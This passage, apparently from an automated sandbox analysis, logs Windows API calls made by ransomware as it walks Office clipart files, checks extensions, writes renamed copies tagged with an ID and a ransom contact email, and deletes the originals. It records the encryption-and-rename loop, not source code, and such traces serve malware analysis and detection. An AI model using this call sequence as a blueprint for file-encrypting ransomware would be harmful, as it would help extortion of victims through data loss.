lstrlenW (lpString=".xls") returned 4 [0067.191] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.191] lstrlenW (lpString=".xlsx") returned 5 [0067.191] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.191] lstrlenW (lpString=".ppt") returned 4 [0067.191] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 68 [0067.191] lstrlenW (lpString=".zip") returned 4 [0067.191] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.191] lstrlenW (lpString=".rar") returned 4 [0067.191] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.191] lstrlenW (lpString=".bz2") returned 4 [0067.191] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.191] lstrlenW (lpString=".7z") returned 3 [0067.191] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 68 [0067.191] lstrlenW (lpString=".dbf") returned 4 [0067.191] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 68 [0067.191] lstrlenW (lpString=".1cd") returned 4 [0067.191] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 68 [0067.191] lstrlenW (lpString=".jpg") returned 4 [0067.191] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.191] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.192] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00693_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0067.192] GetLastError () returned 0x0 [0067.192] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1bba, lpOverlapped=0x0) returned 1 [0067.198] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1bc0, lpOverlapped=0x0) returned 1 [0067.198] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0067.199] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0067.199] SetEndOfFile (hFile=0x384) returned 1 [0067.199] CloseHandle (hObject=0x384) returned 1 [0067.199] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.199] SetEndOfFile (hFile=0x388) returned 1 [0067.200] CloseHandle (hObject=0x388) returned 1 [0067.200] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.200] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00693_.wmf")) returned 1 [0067.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 68 [0067.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 68 [0067.201] lstrlenW (lpString=".doc") returned 4 [0067.201] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.201] lstrlenW (lpString=".docx") returned 5 [0067.201] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.201] lstrlenW (lpString=".pdf") returned 4 [0067.201] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.201] lstrlenW (lpString=".xls") returned 4 [0067.201] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.201] lstrlenW (lpString=".xlsx") returned 5 [0067.201] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.201] lstrlenW (lpString=".ppt") returned 4 [0067.201] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 68 [0067.201] lstrlenW (lpString=".zip") returned 4 [0067.201] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.201] lstrlenW (lpString=".rar") returned 4 [0067.201] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.201] lstrlenW (lpString=".bz2") returned 4 [0067.201] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.201] lstrlenW (lpString=".7z") returned 3 [0067.202] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 68 [0067.202] lstrlenW (lpString=".dbf") returned 4 [0067.202] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 68 [0067.202] lstrlenW (lpString=".1cd") returned 4 [0067.202] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 68 [0067.202] lstrlenW (lpString=".jpg") returned 4 [0067.202] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.202] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.202] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01013_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0067.203] GetLastError () returned 0x0 [0067.203] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xb20, lpOverlapped=0x0) returned 1 [0067.212] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xb30, lpOverlapped=0x0) returned 1 [0067.213] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0067.213] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0067.213] SetEndOfFile (hFile=0x384) returned 1 [0067.213] CloseHandle (hObject=0x384) returned 1 [0067.213] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.213] SetEndOfFile (hFile=0x388) returned 1 [0067.214] CloseHandle (hObject=0x388) returned 1 [0067.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.214] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01013_.wmf")) returned 1 [0067.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 68 [0067.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 68 [0067.215] lstrlenW (lpString=".doc") returned 4 [0067.215] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.215] lstrlenW (lpString=".docx") returned 5 [0067.215] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.215] lstrlenW (lpString=".pdf") returned 4 [0067.215] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.215] lstrlenW (lpString=".xls") returned 4 [0067.215] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.215] lstrlenW (lpString=".xlsx") returned 5 [0067.215] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.215] lstrlenW (lpString=".ppt") returned 4 [0067.215] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 68 [0067.215] lstrlenW (lpString=".zip") returned 4 [0067.215] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.215] lstrlenW (lpString=".rar") returned 4 [0067.215] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.215] lstrlenW (lpString=".bz2") returned 4 [0067.215] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.215] lstrlenW (lpString=".7z") returned 3 [0067.215] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 68 [0067.215] lstrlenW (lpString=".dbf") returned 4 [0067.215] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 68 [0067.215] lstrlenW (lpString=".1cd") returned 4 [0067.215] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 68 [0067.215] lstrlenW (lpString=".jpg") returned 4 [0067.215] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.215] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.216] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01015_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0067.216] GetLastError () returned 0x0 [0067.216] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x47c, lpOverlapped=0x0) returned 1 [0067.217] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x480, lpOverlapped=0x0) returned 1 [0067.221] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0067.221] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0067.221] SetEndOfFile (hFile=0x384) returned 1 [0067.221] CloseHandle (hObject=0x384) returned 1 [0067.221] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.221] SetEndOfFile (hFile=0x388) returned 1 [0067.222] CloseHandle (hObject=0x388) returned 1 [0067.222] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.222] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01015_.wmf")) returned 1 [0067.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 68 [0067.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 68 [0067.222] lstrlenW (lpString=".doc") returned 4 [0067.223] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.223] lstrlenW (lpString=".docx") returned 5 [0067.223] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.223] lstrlenW (lpString=".pdf") returned 4 [0067.223] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.223] lstrlenW (lpString=".xls") returned 4 [0067.223] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.223] lstrlenW (lpString=".xlsx") returned 5 [0067.223] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.223] lstrlenW (lpString=".ppt") returned 4 [0067.223] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 68 [0067.223] lstrlenW (lpString=".zip") returned 4 [0067.223] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.223] lstrlenW (lpString=".rar") returned 4 [0067.223] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.223] lstrlenW (lpString=".bz2") returned 4 [0067.223] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.223] lstrlenW (lpString=".7z") returned 3 [0067.223] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 68 [0067.223] lstrlenW (lpString=".dbf") returned 4 [0067.223] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 68 [0067.223] lstrlenW (lpString=".1cd") returned 4 [0067.223] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 68 [0067.223] lstrlenW (lpString=".jpg") returned 4 [0067.223] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.224] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.224] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01058_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0067.225] GetLastError () returned 0x0 [0067.225] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xac4, lpOverlapped=0x0) returned 1 [0067.237] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xad0, lpOverlapped=0x0) returned 1 [0067.239] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0067.239] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0067.239] SetEndOfFile (hFile=0x384) returned 1 [0067.239] CloseHandle (hObject=0x384) returned 1 [0067.239] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.239] SetEndOfFile (hFile=0x388) returned 1 [0068.372] CloseHandle (hObject=0x388) returned 1 [0068.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.376] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01058_.wmf")) returned 1 [0068.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 68 [0068.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 68 [0068.376] lstrlenW (lpString=".doc") returned 4 [0068.376] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.376] lstrlenW (lpString=".docx") returned 5 [0068.376] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.376] lstrlenW (lpString=".pdf") returned 4 [0068.376] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.376] lstrlenW (lpString=".xls") returned 4 [0068.376] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.376] lstrlenW (lpString=".xlsx") returned 5 [0068.376] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.376] lstrlenW (lpString=".ppt") returned 4 [0068.376] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 68 [0068.377] lstrlenW (lpString=".zip") returned 4 [0068.377] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.377] lstrlenW (lpString=".rar") returned 4 [0068.377] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.377] lstrlenW (lpString=".bz2") returned 4 [0068.377] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.377] lstrlenW (lpString=".7z") returned 3 [0068.377] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 68 [0068.377] lstrlenW (lpString=".dbf") returned 4 [0068.377] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 68 [0068.377] lstrlenW (lpString=".1cd") returned 4 [0068.377] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 68 [0068.377] lstrlenW (lpString=".jpg") returned 4 [0068.377] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.378] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.378] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00172_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0068.378] GetLastError () returned 0x0 [0068.378] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xb10, lpOverlapped=0x0) returned 1 [0068.394] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xb20, lpOverlapped=0x0) returned 1 [0068.395] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.395] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0068.395] SetEndOfFile (hFile=0x368) returned 1 [0068.396] CloseHandle (hObject=0x368) returned 1 [0068.396] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.396] SetEndOfFile (hFile=0x388) returned 1 [0068.396] CloseHandle (hObject=0x388) returned 1 [0068.396] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.397] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00172_.wmf")) returned 1 [0068.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 68 [0068.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 68 [0068.397] lstrlenW (lpString=".doc") returned 4 [0068.397] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.397] lstrlenW (lpString=".docx") returned 5 [0068.397] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.397] lstrlenW (lpString=".pdf") returned 4 [0068.397] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.397] lstrlenW (lpString=".xls") returned 4 [0068.397] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.397] lstrlenW (lpString=".xlsx") returned 5 [0068.397] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.397] lstrlenW (lpString=".ppt") returned 4 [0068.397] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 68 [0068.397] lstrlenW (lpString=".zip") returned 4 [0068.397] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.398] lstrlenW (lpString=".rar") returned 4 [0068.398] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.398] lstrlenW (lpString=".bz2") returned 4 [0068.398] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.398] lstrlenW (lpString=".7z") returned 3 [0068.398] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 68 [0068.398] lstrlenW (lpString=".dbf") returned 4 [0068.398] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 68 [0068.398] lstrlenW (lpString=".1cd") returned 4 [0068.398] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 68 [0068.398] lstrlenW (lpString=".jpg") returned 4 [0068.398] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.399] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.399] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: 